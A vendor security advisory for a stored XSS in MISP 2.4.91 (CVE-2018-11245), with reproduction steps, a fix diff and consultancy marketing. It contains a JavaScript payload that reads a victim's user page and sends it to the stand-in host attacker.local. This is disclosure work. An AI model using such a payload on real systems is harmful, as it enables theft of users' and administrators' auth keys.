We are reliable, trustworthy, and ready for challenges! Hire Us
MISP – XSS with cortex type attributes
- Home
- Advisories
- MISP – XSS with cortex type attributes
DATE
18.05.2018
Affected Vendor
CIRCL – Computer Incident Response Center Luxembourg
Affected Product
MISP – Malware Information Sharing Platform & Open Standards For Threat Information Sharing – https://www.misp-project.org/
Vulnerable version
2.4.91
Fixed version
2.4.92
CVSS
6.4 Medium CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Recommendations
Update to MISP version 2.4.92
Vulnerability details
This is very dangerous because every user with permissions to add attributes can attack any other user including administrator exfiltrating for example auth key.
Attack requires victim to visit crafted event and click on the attribute but is very easy to conduct.
Easiest way to reproduce it:
- Create an event
- Add an attribute
Category: External analysis
Type: cortex
Distribution: Inherit event
Value:
{
"jsonrpc": "2.0",
"result": "Faketext<script>alert('XSS');</script>",
"id": 1
}
- Click on the value of newly created attribute (Cortex object)
Value of the cortex attribute:
{
"jsonrpc": "2.0",
"result": "Faketext<script>$.get('/users/view/me',function(d){pos_start = d.indexOf('<h2>User</h2>');pos_end=d.indexOf(decodeURI('%3Cdiv%20class=%22actions%20debugOff%20sideMenu%22%3E'), pos_start);if(pos_start > pos_end) pos_end = pos_start*99;interested = d.substring(pos_start, pos_end);$.get('http://attacker.local/'+escape(interested));});</script>",
"id": 1
}
Here is a fix:
root@misp:/var/www/MISP/app/webroot/js# diff misp.js misp.js.fix
3163c3163
< cortex_data = JSON.stringify(cortex_data, null, 2);
---
> cortex_data = htmlEncode(JSON.stringify(cortex_data, null, 2));
CVE
CVE-2018-11245
Credits
Dawid Czarnecki
Do you think the security of your data might be lacking? Let's find the best approach together.
Once you contact us, we will ask you about the project you want to secure.